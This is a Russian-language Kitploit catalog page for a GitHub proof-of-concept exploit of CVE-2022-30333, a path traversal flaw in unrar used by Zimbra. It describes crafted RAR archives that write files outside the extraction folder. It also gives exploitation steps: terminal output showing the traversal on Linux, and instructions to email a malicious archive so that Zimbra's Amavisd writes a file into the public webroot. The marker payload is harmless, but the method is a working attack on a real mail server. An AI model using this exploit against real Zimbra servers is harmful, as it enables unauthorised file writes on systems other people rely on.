Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-30333-PoC — Эксплойт доказательства концепции для CVE-2022-30333, уязвимости обхода пути в unrar, используемом Zimbra, демонстрирующий произвольную запись файлов через специально созданные RAR-архивы. | Kitploit
Инструменты/GitHubGitHub/thel1ghtvn/cve-2022-30333-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubthel1ghtvn/cve-2022-30333-poc

CVE-2022-30333-PoC

Эксплойт доказательства концепции для CVE-2022-30333, уязвимости обхода пути в unrar, используемом Zimbra, демонстрирующий произвольную запись файлов через специально созданные RAR-архивы.

Репозиторий
1334 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-30333-POC

Пример файла для тестирования CVE-2022-30333

  • Sample.rar : если вы хотите протестировать на Linux. При распаковке он создает trav в ../../tmp/traversed. Убедитесь, что каталог ../../tmp/traversed существует перед извлечением Sample.rar

  • exp.rar : если вы хотите протестировать на почтовом сервере Zimbra. При распаковке он создает moo.txt в /opt/zimbra/jetty_base/webapps/zimbra/public/. Вы можете получить доступ к этому файлу по адресу https://zimbra_mail_domain/public/moo.txt

ШАГИ ЭКСПЛУАТАЦИИ

Тестирование на Linux

mkdir ../../tmp/traversed (the destination folder must exsist before unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"

Тестирование на Zimbra

  • Создайте письмо и прикрепите вредоносный rar-файл, затем отправьте на адрес Zimbra. Этот rar-файл будет извлечён при анализе с помощью Amavisd.
  • Файл moo.txt должен находиться по адресу: /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt или https://zimbra_mail_domain/public/moo.txt

ССЫЛКИ

  1. Вьетнамский блог от DEV2SEC
  2. Английский блог от Sonarsource
  3. Особая благодарность mrlihd за помощь в восстановлении цепочки атаки на Zimbra
Скачать инструмент